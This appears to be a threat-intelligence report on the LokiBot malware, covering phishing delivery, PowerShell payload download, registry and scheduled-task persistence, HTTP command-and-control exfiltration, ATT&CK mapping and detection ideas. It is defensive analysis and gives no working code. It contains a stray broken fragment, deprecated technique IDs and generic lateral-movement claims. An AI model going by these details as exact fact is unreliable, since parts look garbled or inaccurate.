James Calloway — Threat Hunter
Key Takeaways
- LokiBot leverages both phishing and exploit-based initial access methods to deploy its payloads.
- Persistent mechanisms include registry modifications and scheduled tasks, aiding long-term stealth.
- The tool employs complex C2 communication patterns for command execution and data exfiltration.
Executive Summary
During our analysis of the LokiBot malware variant, we observed a sophisticated attack chain characterized by credential theft and lateral movement within enterprise environments. This analysis outlines the step-by-step approach taken by the threat actor, from initial access to the eventual compromise of sensitive data.
Initial Access
The initial access vector employed by LokiBot is a combination of phishing campaigns and exploits targeting vulnerabilities in commonly used software. Our investigation revealed that the actor often distributes malicious attachments in emails, which, when opened, execute a PowerShell command utilizing the Invoke-WebRequest cmdlet to download the main payload from a remote server. The dropped sample typically resides in temporary directories, such as %TEMP%, hiding its presence amidst legitimate files.
andom_file.exe
Execution & Persistence
Post-execution, we noted that LokiBot employs multiple persistence mechanisms. One prevalent method involves making modifications to the registry at HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, adding an entry that ensures the malware starts upon user login. Additionally, our analysis uncovered the creation of a scheduled task under TaskScheduler, further solidifying the implant’s ability to maintain access even after system reboots. This dual-layer persistence strategy highlights the actor’s foresight in ensuring their foothold remains secure.
Command and Control
Command and control (C2) communication is integral to LokiBot’s operation, and our findings indicate that the actor employs a mix of HTTP and HTTPS protocols to communicate with the C2 server, blending in with normal traffic. The malware used dynamic DNS services to obscure the C2 infrastructure, making detection challenging. During our monitoring, we identified C2 URLs that often resolve to various IPs, providing the actor with an additional layer of obfuscation. The payload frequently sends HTTP POST requests, containing exfiltrated data in JSON format, facilitating seamless data extraction without raising immediate alarms.
Lateral Movement & Discovery
Once inside a network, LokiBot exhibits lateral movement capabilities that allow the actor to expand their reach and gather additional credentials. Utilizing the Windows Management Instrumentation (WMI) and PowerShell Remoting, the malware attempts to discover other systems on the network while harvesting user credentials via techniques such as Password Spraying and Credential Dumping. Immediate focus is often placed on high-value assets and domain controllers, amplifying the impact of the breach.
Impact & Objectives
The overarching objective of LokiBot typically revolves around data exfiltration and credential harvesting. The collected credentials can lead to further compromises within the organization, setting the stage for subsequent attacks that could involve data encryption or identity theft. Our analysis revealed that the average targeted assets included financial systems and personally identifiable information (PII), giving the actor both financial and strategic advantages.
MITRE ATT&CK Mapping
- T1193 – Phishing: The actor utilized phishing emails with malicious attachments to gain initial access to the network.
- T1059.001 – Command and Scripting Interpreter: PowerShell: PowerShell scripts were employed for downloading and executing the main payload.
- T1071.001 – Application Layer Protocol: Web Protocols: HTTP and HTTPS were used for C2 communication, complicating detection efforts.
- T1075 – Pass-the-Hash: Credentials harvested by LokiBot were wielded for lateral movement attempts.
Detection Opportunities
- Monitor for unusual registry modifications related to startup programs, particularly in
HKEY_CURRENT_USER\\Software\Microsoft\Windows\CurrentVersion\Run. - Implement logging and monitoring for outbound HTTP/HTTPS connections, particularly to ephemeral or dynamic DNS addresses.
- Employ behavior-based detection mechanisms to identify suspicious PowerShell activity, especially command invocations that resemble credential dumping.
Analyst Notes
The intricacies of LokiBot’s operation necessitate dynamic defense strategies that encompass behavioral monitoring and network traffic analysis. As threat actors become increasingly adept at using legitimate tools for malicious purposes, our collective vigilance must evolve to counter these advanced techniques effectively.
Source: Original Report